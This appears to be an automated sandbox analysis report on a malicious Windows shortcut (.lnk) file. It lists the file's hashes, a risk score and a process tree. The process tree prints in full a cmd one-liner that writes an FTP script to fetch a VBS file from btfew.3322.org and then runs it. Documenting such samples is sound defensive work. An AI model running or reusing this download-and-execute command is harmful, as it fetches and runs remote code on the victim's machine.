Analysis
-
max time kernel
7s -
max time network
46s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
28-10-2022 23:08
General
-
Target
8533fdd14f843d95bf261e4226416aa1326a8dba714732a47363c2f8ab8467ef.lnk
-
Size
2KB
-
MD5
0ad6820546ab727a967b6ec4eaa3da60
-
SHA1
0bff1501b8b2df52be0a5250123e668b50f96af2
-
SHA256
8533fdd14f843d95bf261e4226416aa1326a8dba714732a47363c2f8ab8467ef
-
SHA512
0636a406076c783b840f0a3cd44ed6a74d1dc16ebf941ddb3630a5d9c842f49aef20e8a90eafd9ca7f5877674a4385b858e80d801899dc61a28310df92555703
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\8533fdd14f843d95bf261e4226416aa1326a8dba714732a47363c2f8ab8467ef.lnk1⤵
-
C:\WINDOWS\system32\cmd.exe"C:\WINDOWS\system32\cmd.exe" /c echo open btfew.3322.org>>m.t&echo 123>>m.t&echo 123>>m.t&echo get jnj C:\Windows\link.vbs>>m.t&echo bye>>m.t&ftp -s:m.t& del m.t&start C:\Windows\link.vbs2⤵
-
C:\Windows\system32\ftp.exeftp -s:m.t3⤵
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65B
MD56b395d25b50e046503334a2b080f96c9
SHA195d7bd2428541fdad546974733b91c6797307d31
SHA2566b7cdf0009c19b0e0d61511232b405d962fb48a26e2116a6227780c7073cbad3
SHA51232f193e0febe4724def611bb8aaf5ba51a3055473116b686d43c9b4f5908e8b89bb48a8ea9f277d38a99e406160658af8e4c725c888d6885f651b85b4f71f8c3
-
-